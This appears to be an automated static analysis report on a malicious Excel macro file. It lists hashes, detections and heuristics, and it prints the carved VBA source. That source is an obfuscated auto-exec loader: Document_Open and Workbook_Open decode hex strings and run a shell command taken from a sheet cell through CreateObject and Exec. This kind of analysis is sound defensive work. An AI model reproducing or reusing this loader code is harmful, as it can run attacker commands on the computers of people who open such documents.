Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 073e13fbc0d45bd2…

MALICIOUS

Office (OLE)

225.5 KB Created: 2018-05-11 08:42:05 Authoring application: Microsoft Excel First seen: 2019-12-10
MD5: 2c60319b97e62d40335b5766b7942317 SHA-1: 5832dc824c69ba0232f89532d20f63f871bc3cac SHA-256: 073e13fbc0d45bd2353b67b0aff5f93f20ec48d794ed9d19c5b4403e08547f49
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel file contains heavily obfuscated VBA and XLM macros, including auto-executing Document_Open and Workbook_Open routines. The VBA code uses a custom decoder function to deobfuscate a string, which is then executed using Application.Run. This pattern strongly suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection name 'Xls.Malware.Valyria-6700358-0' further supports its malicious nature.

Heuristics 9

  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: b07e9b3c0bc67a5abf1f3d5a279d12af20bcec7c89268c78faaa2dc946b3582d
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  MPro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7573 bytes
SHA-256: 0f26c34155dc7080a87de066c36d199b11a5524475f458cd0925e6b3cafbaa52
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function acJRK() As String
Dim aacJRK As String
aacJRK = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acJRK = aacJRKEnd Function

Public Function J_RE(ByVal KN_I As String)
   Dim MPN_LBQ As String
   Dim Z_V As Long
   For Z_V = 1 To Len(KN_I) Step 2
        MPN_LBQ = MPN_LBQ & Chr(CLng("&H" & Mid(KN_I, Z_V, 2)) - 18)
   Next
   J_RE = MPN_LBQ
End Function
Public Sub Document_Open()
    Application.Run J_RE("685B6C615B64566955715F5959")
End Sub
Private Function acA58() As String
Dim aacA58 As String
aacA58 = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acA58 = aacA58End Function

Sub Workbook_Open()
    Application.Run "ThisWorkbook." & J_RE("685B6C615B64566955715F5959")
End Sub
Private Function acIQV() As String
Dim aacIQV As String
aacIQV = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acIQV = aacIQVEnd Function

Public Sub O_KI()
    Dim KN_I As Object: Set KN_I = VBA.CreateObject(J_RE("696575847B828640657A777E7E"))
    KN_I.Exec (J_RE(ThisWorkbook.Sheets("MProp").Range("J225").Value))
End Sub
Private Function acXBP() As String
Dim aacXBP As String
aacXBP = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acXBP = aacXBPEnd Function

Sub VIZOIRDWC_MGG()
    O_KI
End Sub

' Processing file: /opt/analyzer/scan_staging/ac6866b60f57410f8f3118b901936ad4.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8298 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Private Function KN_I(id_FFFE As String) As String)
' Line #2:
' 	Dim 
' 	VarDefn MPN_LBQ (As String)
' Line #3:
' 	LitStr 0x018E "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
' 	St MPN_LBQ 
' Line #4:
' 	Reparse 0x001A "acJRK = aacJRKEnd Function"
' Line #5:
' Line #6:
' 	FuncDefn (Public Function Chr(ByVal Document_Open As String, id_FFFE As Variant))
' Line #7:
' 	Dim 
' 	VarDefn Application (As String)
' Line #8:
' 	Dim 
' 	VarDefn Run (As Long)
' Line #9:
' 	S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.